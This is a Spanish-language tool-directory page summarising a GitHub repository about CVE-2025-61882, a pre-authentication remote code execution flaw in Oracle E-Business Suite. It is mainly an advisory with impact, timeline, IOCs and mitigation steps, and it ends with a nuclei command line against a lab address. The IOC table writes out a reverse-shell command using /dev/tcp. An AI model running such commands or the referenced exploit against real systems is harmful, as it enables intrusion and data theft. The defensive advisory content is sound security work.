Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónInteligencia de AmenazasRespuesta a Incidentes
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Proporciona un aviso detallado de CVE-2025-61882 con análisis técnico, IOCs, consultas de detección y una plantilla de exploit basada en nuclei para RCE sin autenticación previa en Oracle E-Business Suite.

Ver Repositorio
215hace 0 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️🚨 CVE‑2025‑61882 — Ejecución Remota de Código Crítica Pre‑Autenticación en Oracle E‑Business Suite (EBS) 🚨🛡️

Resumen breve: Ejecución remota de código crítica pre‑autenticación en Oracle E‑Business Suite (EBS) — afecta a 12.2.3 → 12.2.14, CVSS 9.8, explotada activamente en el mundo real (se ha informado de actividad de ransomware/extorsión). ([oracle.com][1])


📌 Datos rápidos (tabla)

CampoDetalles
🆔 CVECVE‑2025‑61882
🧾 Producto / ComponenteOracle E‑Business Suite (EBS) — integración de Concurrent Processing / BI Publisher
📦 Versiones afectadas12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TipoEjecución Remota de Código (RCE) — no se requiere autenticación
🔥 Explotada en el mundo realSí — se ha informado de campañas de explotación masiva / extorsión
📅 Divulgación / cronologíaOctubre de 2025 (aviso del proveedor + análisis públicos). ([oracle.com][1])

(Lo anterior consolidado a partir del aviso del proveedor, NVD/CISA y múltiples análisis de proveedores.) ([oracle.com][1])


💥 Impacto (tabla)

Área de impactoQué significa
🔓 ConfidencialidadLos atacantes pueden leer datos sensibles de RR. HH., finanzas y ERP
🛠️ IntegridadLos atacantes pueden modificar registros, crear puertas traseras o alterar configuraciones
⚡ DisponibilidadLos atacantes pueden interrumpir servicios, ejecutar ransomware o destruir copias de seguridad
🧭 Nivel de riesgoExtremo — RCE pre‑autenticación en un sistema ERP crítico → posible pivote completo de dominio

Referencias que informan de explotación de alto impacto y vínculos con ransomware. ([Rapid7][2])


🛠️ Resumen técnico (conciso)

  • Vector: Las peticiones HTTP/HTTPS a endpoints web expuestos de EBS desencadenan una cadena de vulnerabilidades en la integración de Concurrent Processing / BI Publisher que conduce a la ejecución remota de código. ([oracle.com][1])
  • Complejidad: Baja (sin autenticación, sin interacción del usuario). ([nvd.nist.gov][3])
  • Payloads observados: patrones de reverse shell, web shells, scripts colocados utilizados para la exfiltración de datos y la extorsión. ([Rapid7][2])

🕵️‍♀️ Indicadores de Compromiso (IOCs) — ejemplos (tabla)

Oracle y los equipos de respuesta a incidentes publicaron IOCs; a continuación se muestran ejemplos representativos informados en avisos y análisis de proveedores. Busque estos patrones en registros y endpoints. ([oracle.com][1])

TipoEjemplo
🌐 IPs (observadas)200.107.207.26, 185.181.60.11 (direcciones de ejemplo informadas)
🧾 Patrón de comandosh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ Hashes de archivosVarios hashes SHA‑256 para scripts de explotación sospechosos (consulte el aviso del proveedor para la lista completa)
🕳️ ArtefactosWeb shells inesperados, nuevos cronjobs, conexiones salientes sospechosas a IPs/puertos inusuales

Si desea la lista completa de IOCs (IPs, hashes completos, nombres de archivo), puedo pegarla aquí — diga “pegar IOCs”. (Sin enlaces.)


🧭 Cronología (compacta)

FechaEvento
9 de agosto de 2025Primera actividad de explotación en el mundo real informada (telemetría del proveedor). ([crowdstrike.com][4])
Principios de octubre de 2025Oracle emitió una alerta de seguridad / disponibilidad de parche para EBS. ([oracle.com][1])
6–7 de octubre de 2025CISA añadió el CVE a su catálogo de Vulnerabilidades Explotadas Conocidas (KEV) (orientación para agencias federales, fecha límite para la mitigación). ([cisa.gov][5])
Octubre de 2025 (en curso)Múltiples análisis de proveedores e informes de explotación masiva (CrowdStrike, Rapid7, Tenable, etc.). ([crowdstrike.com][4])

✅ Acciones recomendadas inmediatas (tabla de pasos)

PrioridadAcciónNotas / Especificaciones de ejemplo
1️⃣ CríticaParchear las instancias de EBS afectadasAplique los parches de la Alerta de Seguridad de Oracle para las versiones 12.2.3–12.2.14 inmediatamente. ([oracle.com][1])
2️⃣ AltaAislar / restringir el acceso a los endpoints web de EBSBloquee HTTP/HTTPS de cara a Internet hacia EBS; permita solo IPs de administración de confianza o VPN.
3️⃣ AltaHabilitar/ajustar reglas WAFImplemente firmas WAF de proveedores/comunidad para los patrones de explotación; bloquee payloads sospechosos. ([Rapid7][2])
4️⃣ AltaBuscar y detectarBusque en los registros comandos de reverse shell, escrituras de archivos anómalas y conexiones salientes hacia IOCs.
5️⃣ IncidenteContener y responder si se encuentra compromisoAísle el host, conserve la evidencia forense, cambie las credenciales, reconstruya desde copias de seguridad limpias.
6️⃣ PolíticaInformar y notificarSi está sujeto a requisitos normativos/contractuales, notifique a las partes interesadas y a las autoridades según la política (la orientación de CISA/KEV puede aplicar). ([nvd.nist.gov][3])

💀 Exploits :

┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io
Descargar herramienta